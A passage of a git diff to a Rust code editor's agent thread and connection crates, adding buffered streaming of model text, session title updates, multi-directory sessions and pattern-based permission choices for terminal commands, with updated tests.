"terminal.ansi.dim_white": "#8e8d87ff", "link_text.hover": "#72cffeff", "conflict": "#fecf72ff", "conflict.background": "#574018ff", diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index 58252eaddca553eb1da4c960a829a88afb9eb497..e11d86196ec6367ee6d2ded709c3ba9e100da514 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -31,6 +31,8 @@ use task::{Shell, ShellBuilder}; pub use terminal::*; use text::Bias; use ui::App; +use util::markdown::MarkdownEscaped; +use util::path_list::PathList; use util::{ResultExt, get_default_system_shell_preferring_bash, paths::PathStyle}; use uuid::Uuid; @@ -245,6 +247,8 @@ impl ToolCall { ) -> Result { let title = if tool_call.kind == acp::ToolKind::Execute { tool_call.title + } else if tool_call.kind == acp::ToolKind::Edit { + MarkdownEscaped(tool_call.title.as_str()).to_string() } else if let Some((first_line, _)) = tool_call.title.split_once("\n") { first_line.to_owned() + "…" } else { @@ -333,6 +337,8 @@ impl ToolCall { self.label.update(cx, |label, cx| { if self.kind == acp::ToolKind::Execute { label.replace(title, cx); + } else if self.kind == acp::ToolKind::Edit { + label.replace(MarkdownEscaped(&title).to_string(), cx) } else if let Some((first_line, _)) = title.split_once("\n") { label.replace(first_line.to_owned() + "…", cx); } else { @@ -488,6 +494,54 @@ impl From<&ResolvedLocation> for AgentLocation { } } +#[derive(Debug, Clone)] +pub enum SelectedPermissionParams { + Terminal { patterns: Vec }, +} + +#[derive(Debug)] +pub struct SelectedPermissionOutcome { + pub option_id: acp::PermissionOptionId, + pub option_kind: acp::PermissionOptionKind, + pub params: Option, +} + +impl SelectedPermissionOutcome { + pub fn new(option_id: acp::PermissionOptionId, option_kind: acp::PermissionOptionKind) -> Self { + Self { + option_id, + option_kind, + params: None, + } + } + + pub fn params(mut self, params: Option) -> Self { + self.params = params; + self + 
} +} + +impl From for acp::SelectedPermissionOutcome { + fn from(value: SelectedPermissionOutcome) -> Self { + Self::new(value.option_id) + } +} + +#[derive(Debug)] +pub enum RequestPermissionOutcome { + Cancelled, + Selected(SelectedPermissionOutcome), +} + +impl From for acp::RequestPermissionOutcome { + fn from(value: RequestPermissionOutcome) -> Self { + match value { + RequestPermissionOutcome::Cancelled => Self::Cancelled, + RequestPermissionOutcome::Selected(outcome) => Self::Selected(outcome.into()), + } + } +} + #[derive(Debug)] pub enum ToolCallStatus { /// The tool call hasn't started running yet, but we start showing it to @@ -496,7 +550,7 @@ pub enum ToolCallStatus { /// The tool call is waiting for confirmation from the user. WaitingForConfirmation { options: PermissionOptions, - respond_tx: oneshot::Sender, + respond_tx: oneshot::Sender, }, /// The tool call is currently running. InProgress, @@ -866,6 +920,7 @@ impl Plan { } acp::PlanEntryStatus::InProgress => { stats.in_progress_entry = stats.in_progress_entry.or(Some(entry)); + stats.pending += 1; } acp::PlanEntryStatus::Completed => { stats.completed += 1; @@ -953,9 +1008,9 @@ struct RunningTurn { pub struct AcpThread { session_id: acp::SessionId, - cwd: Option, + work_dirs: Option, parent_session_id: Option, - title: SharedString, + title: Option, provisional_title: Option, entries: Vec, plan: Plan, @@ -976,6 +1031,30 @@ pub struct AcpThread { draft_prompt: Option>, /// The initial scroll position for the thread view, set during session registration. ui_scroll_position: Option, + /// Buffer for smooth text streaming. Holds text that has been received from + /// the model but not yet revealed in the UI. A timer task drains this buffer + /// gradually to create a fluid typing effect instead of choppy chunk-at-a-time + /// updates. + streaming_text_buffer: Option, +} + +struct StreamingTextBuffer { + /// Text received from the model but not yet appended to the Markdown source. 
+ pending: String, + /// The number of bytes to reveal per timer turn. + bytes_to_reveal_per_tick: usize, + /// The Markdown entity being streamed into. + target: Entity, + /// Timer task that periodically moves text from `pending` into `source`. + _reveal_task: Task<()>, +} + +impl StreamingTextBuffer { + /// The number of milliseconds between each timer tick, controlling how quickly + /// text is revealed. + const TASK_UPDATE_MS: u64 = 16; + /// The time in milliseconds to reveal the entire pending text. + const REVEAL_TARGET: f32 = 200.0; } impl From<&AcpThread> for ActionLogTelemetry { @@ -1094,8 +1173,8 @@ impl Error for LoadError {} impl AcpThread { pub fn new( parent_session_id: Option, - title: impl Into, - cwd: Option, + title: Option, + work_dirs: Option, connection: Rc, project: Entity, action_log: Entity, @@ -1116,12 +1195,12 @@ impl AcpThread { Self { parent_session_id, - cwd, + work_dirs, action_log, shared_buffers: Default::default(), entries: Default::default(), plan: Default::default(), - title: title.into(), + title, provisional_title: None, project, running_turn: None, @@ -1137,6 +1216,7 @@ impl AcpThread { had_error: false, draft_prompt: None, ui_scroll_position: None, + streaming_text_buffer: None, } } @@ -1176,10 +1256,14 @@ impl AcpThread { &self.project } - pub fn title(&self) -> SharedString { - self.provisional_title + pub fn title(&self) -> Option { + self.title .clone() - .unwrap_or_else(|| self.title.clone()) + .or_else(|| self.provisional_title.clone()) + } + + pub fn has_provisional_title(&self) -> bool { + self.provisional_title.is_some() } pub fn entries(&self) -> &[AgentThreadEntry] { @@ -1190,8 +1274,8 @@ impl AcpThread { &self.session_id } - pub fn cwd(&self) -> Option<&PathBuf> { - self.cwd.as_ref() + pub fn work_dirs(&self) -> Option<&PathList> { + self.work_dirs.as_ref() } pub fn status(&self) -> ThreadStatus { @@ -1296,6 +1380,18 @@ impl AcpThread { acp::SessionUpdate::Plan(plan) => { self.update_plan(plan, cx); } + 
acp::SessionUpdate::SessionInfoUpdate(info_update) => { + if let acp::MaybeUndefined::Value(title) = info_update.title { + let had_provisional = self.provisional_title.take().is_some(); + let title: SharedString = title.into(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title); + cx.emit(AcpThreadEvent::TitleUpdated); + } else if had_provisional { + cx.emit(AcpThreadEvent::TitleUpdated); + } + } + } acp::SessionUpdate::AvailableCommandsUpdate(acp::AvailableCommandsUpdate { available_commands, .. @@ -1343,6 +1439,7 @@ impl AcpThread { }) = last_entry && *existing_indented == indented { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); *id = message_id.or(id.take()); content.append(chunk.clone(), &language_registry, path_style, cx); chunks.push(chunk); @@ -1379,8 +1476,20 @@ impl AcpThread { indented: bool, cx: &mut Context, ) { - let language_registry = self.project.read(cx).languages().clone(); let path_style = self.project.read(cx).path_style(cx); + + // For text chunks going to an existing Markdown block, buffer for smooth + // streaming instead of appending all at once which may feel more choppy. 
+ if let acp::ContentBlock::Text(text_content) = &chunk { + if let Some(markdown) = self.streaming_markdown_target(is_thought, indented) { + let entries_len = self.entries.len(); + cx.emit(AcpThreadEvent::EntryUpdated(entries_len - 1)); + self.buffer_streaming_text(&markdown, text_content.text.clone(), cx); + return; + } + } + + let language_registry = self.project.read(cx).languages().clone(); let entries_len = self.entries.len(); if let Some(last_entry) = self.entries.last_mut() && let AgentThreadEntry::AssistantMessage(AssistantMessage { @@ -1391,6 +1500,7 @@ impl AcpThread { && *existing_indented == indented { let idx = entries_len - 1; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); cx.emit(AcpThreadEvent::EntryUpdated(idx)); match (chunks.last_mut(), is_thought) { (Some(AssistantMessageChunk::Message { block }), false) @@ -1425,7 +1535,134 @@ impl AcpThread { } } + fn streaming_markdown_target( + &self, + is_thought: bool, + indented: bool, + ) -> Option> { + let last_entry = self.entries.last()?; + if let AgentThreadEntry::AssistantMessage(AssistantMessage { + chunks, + indented: existing_indented, + .. + }) = last_entry + && *existing_indented == indented + && let [.., chunk] = chunks.as_slice() + { + match (chunk, is_thought) { + ( + AssistantMessageChunk::Message { + block: ContentBlock::Markdown { markdown }, + }, + false, + ) + | ( + AssistantMessageChunk::Thought { + block: ContentBlock::Markdown { markdown }, + }, + true, + ) => Some(markdown.clone()), + _ => None, + } + } else { + None + } + } + + /// Add text to the streaming buffer. If the target changed (e.g. switching + /// from thoughts to message text), flush the old buffer first. 
+ fn buffer_streaming_text( + &mut self, + markdown: &Entity, + text: String, + cx: &mut Context, + ) { + if let Some(buffer) = &mut self.streaming_text_buffer { + if buffer.target.entity_id() == markdown.entity_id() { + buffer.pending.push_str(&text); + + buffer.bytes_to_reveal_per_tick = (buffer.pending.len() as f32 + / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + return; + } + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); + } + + let target = markdown.clone(); + let _reveal_task = self.start_streaming_reveal(cx); + let pending_len = text.len(); + let bytes_to_reveal = (pending_len as f32 / StreamingTextBuffer::REVEAL_TARGET + * StreamingTextBuffer::TASK_UPDATE_MS as f32) + .ceil() as usize; + self.streaming_text_buffer = Some(StreamingTextBuffer { + pending: text, + bytes_to_reveal_per_tick: bytes_to_reveal, + target, + _reveal_task, + }); + } + + /// Flush all buffered streaming text into the Markdown entity immediately. + fn flush_streaming_text( + streaming_text_buffer: &mut Option, + cx: &mut Context, + ) { + if let Some(buffer) = streaming_text_buffer.take() { + if !buffer.pending.is_empty() { + buffer + .target + .update(cx, |markdown, cx| markdown.append(&buffer.pending, cx)); + } + } + } + + /// Spawns a foreground task that periodically drains + /// `streaming_text_buffer.pending` into the target `Markdown` entity, + /// producing smooth, continuous text output. 
+ fn start_streaming_reveal(&self, cx: &mut Context) -> Task<()> { + cx.spawn(async move |this, cx| { + loop { + cx.background_executor() + .timer(Duration::from_millis(StreamingTextBuffer::TASK_UPDATE_MS)) + .await; + + let should_continue = this + .update(cx, |this, cx| { + let Some(buffer) = &mut this.streaming_text_buffer else { + return false; + }; + + if buffer.pending.is_empty() { + return true; + } + + let pending_len = buffer.pending.len(); + + let byte_boundary = buffer + .pending + .ceil_char_boundary(buffer.bytes_to_reveal_per_tick) + .min(pending_len); + + buffer.target.update(cx, |markdown: &mut Markdown, cx| { + markdown.append(&buffer.pending[..byte_boundary], cx); + buffer.pending.drain(..byte_boundary); + }); + + true + }) + .unwrap_or(false); + + if !should_continue { + break; + } + } + }) + } + fn push_entry(&mut self, entry: AgentThreadEntry, cx: &mut Context) { + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.entries.push(entry); cx.emit(AcpThreadEvent::NewEntry); } @@ -1436,8 +1673,8 @@ impl AcpThread { pub fn set_title(&mut self, title: SharedString, cx: &mut Context) -> Task> { let had_provisional = self.provisional_title.take().is_some(); - if title != self.title { - self.title = title.clone(); + if self.title.as_ref() != Some(&title) { + self.title = Some(title.clone()); cx.emit(AcpThreadEvent::TitleUpdated); if let Some(set_title) = self.connection.set_title(&self.session_id, cx) { return set_title.run(title, cx); @@ -1741,7 +1978,7 @@ impl AcpThread { tool_call: acp::ToolCallUpdate, options: PermissionOptions, cx: &mut Context, - ) -> Result> { + ) -> Result> { let (tx, rx) = oneshot::channel(); let status = ToolCallStatus::WaitingForConfirmation { @@ -1757,10 +1994,8 @@ impl AcpThread { Ok(cx.spawn(async move |this, cx| { let outcome = match rx.await { - Ok(option) => acp::RequestPermissionOutcome::Selected( - acp::SelectedPermissionOutcome::new(option), - ), - Err(oneshot::Canceled) => 
acp::RequestPermissionOutcome::Cancelled, + Ok(outcome) => RequestPermissionOutcome::Selected(outcome), + Err(oneshot::Canceled) => RequestPermissionOutcome::Cancelled, }; this.update(cx, |_this, cx| { cx.emit(AcpThreadEvent::ToolAuthorizationReceived(tool_call_id)) @@ -1773,15 +2008,14 @@ impl AcpThread { pub fn authorize_tool_call( &mut self, id: acp::ToolCallId, - option_id: acp::PermissionOptionId, - option_kind: acp::PermissionOptionKind, + outcome: SelectedPermissionOutcome, cx: &mut Context, ) { let Some((ix, call)) = self.tool_call_mut(&id) else { return; }; - let new_status = match option_kind { + let new_status = match outcome.option_kind { acp::PermissionOptionKind::RejectOnce | acp::PermissionOptionKind::RejectAlways => { ToolCallStatus::Rejected } @@ -1794,7 +2028,7 @@ impl AcpThread { let curr_status = mem::replace(&mut call.status, new_status); if let ToolCallStatus::WaitingForConfirmation { respond_tx, .. } = curr_status { - respond_tx.send(option_id).log_err(); + respond_tx.send(outcome).log_err(); } else if cfg!(debug_assertions) { panic!("tried to authorize an already authorized tool call"); } @@ -1970,6 +2204,8 @@ impl AcpThread { match response { Ok(r) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + if r.stop_reason == acp::StopReason::MaxTokens { this.had_error = true; cx.emit(AcpThreadEvent::Error); @@ -2022,6 +2258,8 @@ impl AcpThread { Ok(Some(r)) } Err(e) => { + Self::flush_streaming_text(&mut this.streaming_text_buffer, cx); + this.had_error = true; cx.emit(AcpThreadEvent::Error); log::error!("Error in run turn: {:?}", e); @@ -2039,6 +2277,7 @@ impl AcpThread { }; self.connection.cancel(&self.session_id, cx); + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); self.mark_pending_tools_as_canceled(); // Wait for the send task to complete @@ -2103,6 +2342,7 @@ impl AcpThread { return Task::ready(Err(anyhow!("not supported"))); }; + Self::flush_streaming_text(&mut self.streaming_text_buffer, cx); let 
telemetry = ActionLogTelemetry::from(&*self); cx.spawn(async move |this, cx| { cx.update(|cx| truncate.run(id.clone(), cx)).await?; @@ -2682,7 +2922,7 @@ mod tests { use futures::{channel::mpsc, future::LocalBoxFuture, select}; use gpui::{App, AsyncApp, TestAppContext, WeakEntity}; use indoc::indoc; - use project::{FakeFs, Fs}; + use project::{AgentId, FakeFs, Fs}; use rand::{distr, prelude::*}; use serde_json::json; use settings::SettingsStore; @@ -2695,7 +2935,7 @@ mod tests { sync::atomic::{AtomicBool, AtomicUsize, Ordering::SeqCst}, time::Duration, }; - use util::path; + use util::{path, path_list::PathList}; fn init_test(cx: &mut TestAppContext) { env_logger::try_init().ok(); @@ -2713,7 +2953,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2777,7 +3023,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project, + PathList::new(&[std::path::Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2865,7 +3117,13 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project.clone(), Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session( + project.clone(), + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) .await .unwrap(); @@ -2976,7 +3234,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - 
.update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3070,7 +3330,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3151,7 +3413,9 @@ mod tests { .unwrap(); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3192,7 +3456,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3267,7 +3533,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3341,7 +3609,9 @@ mod tests { let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx) + }) .await .unwrap(); @@ -3389,7 +3659,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3480,7 +3752,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, 
Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3539,7 +3813,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3712,7 +3988,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3788,7 +4066,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3861,7 +4141,9 @@ mod tests { } })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -3982,6 +4264,10 @@ mod tests { } impl AgentConnection for FakeAgentConnection { + fn agent_id(&self) -> AgentId { + AgentId::new("fake") + } + fn telemetry_id(&self) -> SharedString { "fake".into() } @@ -3993,7 +4279,7 @@ mod tests { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { let session_id = acp::SessionId::new( @@ -4007,8 +4293,8 @@ mod tests { let thread = cx.new(|cx| { AcpThread::new( None, - "Test", - Some(cwd.to_path_buf()), + None, + Some(work_dirs), self.clone(), project, action_log, @@ -4027,7 +4313,7 @@ mod tests { } fn authenticate(&self, method: acp::AuthMethodId, _cx: &mut App) -> Task> { - if self.auth_methods().iter().any(|m| m.id == method) { + if self.auth_methods().iter().any(|m| m.id() == &method) { 
Task::ready(Ok(())) } else { Task::ready(Err(anyhow!("Invalid Auth Method"))) @@ -4107,7 +4393,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4173,7 +4461,9 @@ mod tests { let project = Project::test(fs, [], cx).await; let connection = Rc::new(FakeAgentConnection::new()); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4486,7 +4776,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4560,7 +4852,9 @@ mod tests { })); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4643,7 +4937,9 @@ mod tests { )); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); @@ -4691,13 +4987,15 @@ mod tests { let set_title_calls = connection.set_title_calls.clone(); let thread = cx - .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx)) + .update(|cx| { + connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx) + }) .await .unwrap(); // Initial title is the default. 
thread.read_with(cx, |thread, _| { - assert_eq!(thread.title().as_ref(), "Test"); + assert_eq!(thread.title(), None); }); // Setting a provisional title updates the display title. @@ -4705,7 +5003,10 @@ mod tests { thread.set_provisional_title("Hello, can you help…".into(), cx); }); thread.read_with(cx, |thread, _| { - assert_eq!(thread.title().as_ref(), "Hello, can you help…"); + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Hello, can you help…") + ); }); // The provisional title should NOT have propagated to the connection. @@ -4722,7 +5023,10 @@ mod tests { }); task.await.expect("set_title should succeed"); thread.read_with(cx, |thread, _| { - assert_eq!(thread.title().as_ref(), "Helping with Rust question"); + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); }); assert_eq!( set_title_calls.borrow().as_slice(), @@ -4730,4 +5034,80 @@ mod tests { "real title should propagate to the connection" ); } + + #[gpui::test] + async fn test_session_info_update_replaces_provisional_title_and_emits_event( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let connection = Rc::new(FakeAgentConnection::new()); + + let thread = cx + .update(|cx| { + connection.clone().new_session( + project, + PathList::new(&[Path::new(path!("/test"))]), + cx, + ) + }) + .await + .unwrap(); + + let title_updated_events = Rc::new(RefCell::new(0usize)); + let title_updated_events_for_subscription = title_updated_events.clone(); + thread.update(cx, |_thread, cx| { + cx.subscribe( + &thread, + move |_thread, _event_thread, event: &AcpThreadEvent, _cx| { + if matches!(event, AcpThreadEvent::TitleUpdated) { + *title_updated_events_for_subscription.borrow_mut() += 1; + } + }, + ) + .detach(); + }); + + thread.update(cx, |thread, cx| { + thread.set_provisional_title("Hello, can you help…".into(), cx); + }); + assert_eq!( + 
*title_updated_events.borrow(), + 1, + "setting a provisional title should emit TitleUpdated" + ); + + let result = thread.update(cx, |thread, cx| { + thread.handle_session_update( + acp::SessionUpdate::SessionInfoUpdate( + acp::SessionInfoUpdate::new().title("Helping with Rust question"), + ), + cx, + ) + }); + result.expect("session info update should succeed"); + + thread.read_with(cx, |thread, _| { + assert_eq!( + thread.title().as_ref().map(|s| s.as_str()), + Some("Helping with Rust question") + ); + assert!( + !thread.has_provisional_title(), + "session info title update should clear provisional title" + ); + }); + + assert_eq!( + *title_updated_events.borrow(), + 2, + "session info title update should emit TitleUpdated" + ); + assert!( + connection.set_title_calls.borrow().is_empty(), + "session info title update should not propagate back to the connection" + ); + } } diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index 644986bc15eccbe7d2be32ea5ad6e422db930541..58a8aa33830f12ffb713490c87c47133cc2ad96f 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -2,20 +2,15 @@ use crate::AcpThread; use agent_client_protocol::{self as acp}; use anyhow::Result; use chrono::{DateTime, Utc}; -use collections::IndexMap; +use collections::{HashMap, IndexMap}; use gpui::{Entity, SharedString, Task}; use language_model::LanguageModelProviderId; -use project::Project; +use project::{AgentId, Project}; use serde::{Deserialize, Serialize}; -use std::{ - any::Any, - error::Error, - fmt, - path::{Path, PathBuf}, - rc::Rc, - sync::Arc, -}; +use std::{any::Any, error::Error, fmt, path::PathBuf, rc::Rc, sync::Arc}; +use task::{HideStrategy, SpawnInTerminal, TaskId}; use ui::{App, IconName}; +use util::path_list::PathList; use uuid::Uuid; #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)] @@ -27,13 +22,37 @@ impl UserMessageId { } } +pub fn build_terminal_auth_task( + id: String, + 
label: String, + command: String, + args: Vec, + env: HashMap, +) -> SpawnInTerminal { + SpawnInTerminal { + id: TaskId(id), + full_label: label.clone(), + label: label.clone(), + command: Some(command), + args, + command_label: label, + env, + use_new_terminal: true, + allow_concurrent_runs: true, + hide: HideStrategy::Always, + ..Default::default() + } +} + pub trait AgentConnection { + fn agent_id(&self) -> AgentId; + fn telemetry_id(&self) -> SharedString; fn new_session( self: Rc, project: Entity, - cwd: &Path, + _work_dirs: PathList, cx: &mut App, ) -> Task>>; @@ -47,7 +66,7 @@ pub trait AgentConnection { self: Rc, _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, _title: Option, _cx: &mut App, ) -> Task>> { @@ -60,7 +79,11 @@ pub trait AgentConnection { } /// Close an existing session. Allows the agent to free the session from memory. - fn close_session(&self, _session_id: &acp::SessionId, _cx: &mut App) -> Task> { + fn close_session( + self: Rc, + _session_id: &acp::SessionId, + _cx: &mut App, + ) -> Task> { Task::ready(Err(anyhow::Error::msg("Closing sessions is not supported"))) } @@ -74,7 +97,7 @@ pub trait AgentConnection { self: Rc, _session_id: acp::SessionId, _project: Entity, - _cwd: &Path, + _work_dirs: PathList, _title: Option, _cx: &mut App, ) -> Task>> { @@ -90,6 +113,14 @@ pub trait AgentConnection { fn auth_methods(&self) -> &[acp::AuthMethod]; + fn terminal_auth_task( + &self, + _method: &acp::AuthMethodId, + _cx: &App, + ) -> Option { + None + } + fn authenticate(&self, method: acp::AuthMethodId, cx: &mut App) -> Task>; fn prompt( @@ -239,9 +270,10 @@ impl AgentSessionListResponse { #[derive(Debug, Clone, PartialEq)] pub struct AgentSessionInfo { pub session_id: acp::SessionId, - pub cwd: Option, + pub work_dirs: Option, pub title: Option, pub updated_at: Option>, + pub created_at: Option>, pub meta: Option, } @@ -249,9 +281,10 @@ impl AgentSessionInfo { pub fn new(session_id: impl Into) -> Self { Self { 
session_id: session_id.into(), - cwd: None, + work_dirs: None, title: None, updated_at: None, + created_at: None, meta: None, } } @@ -437,18 +470,53 @@ impl AgentModelList { pub struct PermissionOptionChoice { pub allow: acp::PermissionOption, pub deny: acp::PermissionOption, + pub sub_patterns: Vec, } impl PermissionOptionChoice { pub fn label(&self) -> SharedString { self.allow.name.clone().into() } + + /// Build a `SelectedPermissionOutcome` for this choice. + /// + /// If the choice carries `sub_patterns`, they are attached as + /// `SelectedPermissionParams::Terminal`. + pub fn build_outcome(&self, is_allow: bool) -> crate::SelectedPermissionOutcome { + let option = if is_allow { &self.allow } else { &self.deny }; + + let params = if !self.sub_patterns.is_empty() { + Some(crate::SelectedPermissionParams::Terminal { + patterns: self.sub_patterns.clone(), + }) + } else { + None + }; + + crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind).params(params) + } +} + +/// Pairs a tool's permission pattern with its display name +/// +/// For example, a pattern of `^cargo\\s+build(\\s|$)` would display as `cargo +/// build`. It's handy to keep these together rather than trying to derive +/// one from the other. +#[derive(Debug, Clone, PartialEq)] +pub struct PermissionPattern { + pub pattern: String, + pub display_name: String, } #[derive(Debug, Clone)] pub enum PermissionOptions { Flat(Vec), Dropdown(Vec), + DropdownWithPatterns { + choices: Vec, + patterns: Vec, + tool_name: String, + }, } impl PermissionOptions { @@ -456,6 +524,7 @@ impl PermissionOptions { match self { PermissionOptions::Flat(options) => options.is_empty(), PermissionOptions::Dropdown(options) => options.is_empty(), + PermissionOptions::DropdownWithPatterns { choices, .. } => choices.is_empty(), } } @@ -474,6 +543,17 @@ impl PermissionOptions { None } }), + PermissionOptions::DropdownWithPatterns { choices, .. 
} => { + choices.iter().find_map(|choice| { + if choice.allow.kind == kind { + Some(&choice.allow) + } else if choice.deny.kind == kind { + Some(&choice.deny) + } else { + None + } + }) + } } } @@ -486,6 +566,57 @@ impl PermissionOptions { self.first_option_of_kind(acp::PermissionOptionKind::RejectOnce) .map(|option| option.option_id.clone()) } + + /// Build a `SelectedPermissionOutcome` for the `DropdownWithPatterns` + /// variant when the user has checked specific pattern indices. + /// + /// Returns `Some` with the always-allow/deny outcome when at least one + /// pattern is checked. Returns `None` when zero patterns are checked, + /// signaling that the caller should degrade to allow-once / deny-once. + /// + /// Panics (debug) or returns `None` (release) if called on a non- + /// `DropdownWithPatterns` variant. + pub fn build_outcome_for_checked_patterns( + &self, + checked_indices: &[usize], + is_allow: bool, + ) -> Option { + let PermissionOptions::DropdownWithPatterns { + choices, patterns, .. + } = self + else { + debug_assert!( + false, + "build_outcome_for_checked_patterns called on non-DropdownWithPatterns" + ); + return None; + }; + + let checked_patterns: Vec = patterns + .iter() + .enumerate() + .filter(|(index, _)| checked_indices.contains(index)) + .map(|(_, cp)| cp.pattern.clone()) + .collect(); + + if checked_patterns.is_empty() { + return None; + } + + // Use the first choice (the "Always" choice) as the base for the outcome. 
+ let always_choice = choices.first()?; + let option = if is_allow { + &always_choice.allow + } else { + &always_choice.deny + }; + + let outcome = crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind) + .params(Some(crate::SelectedPermissionParams::Terminal { + patterns: checked_patterns, + })); + Some(outcome) + } } #[cfg(feature = "test-support")] @@ -534,11 +665,14 @@ mod test_support { ) } - #[derive(Clone, Default)] + #[derive(Clone)] pub struct StubAgentConnection { sessions: Arc>>, permission_requests: HashMap, next_prompt_updates: Arc>>, + supports_load_session: bool, + agent_id: AgentId, + telemetry_id: SharedString, } struct Session { @@ -546,12 +680,21 @@ mod test_support { response_tx: Option>, } + impl Default for StubAgentConnection { + fn default() -> Self { + Self::new() + } + } + impl StubAgentConnection { pub fn new() -> Self { Self { next_prompt_updates: Default::default(), permission_requests: HashMap::default(), sessions: Arc::default(), + supports_load_session: false, + agent_id: AgentId::new("stub"), + telemetry_id: "stub".into(), } } @@ -567,6 +710,58 @@ mod test_support { self } + pub fn with_supports_load_session(mut self, supports_load_session: bool) -> Self { + 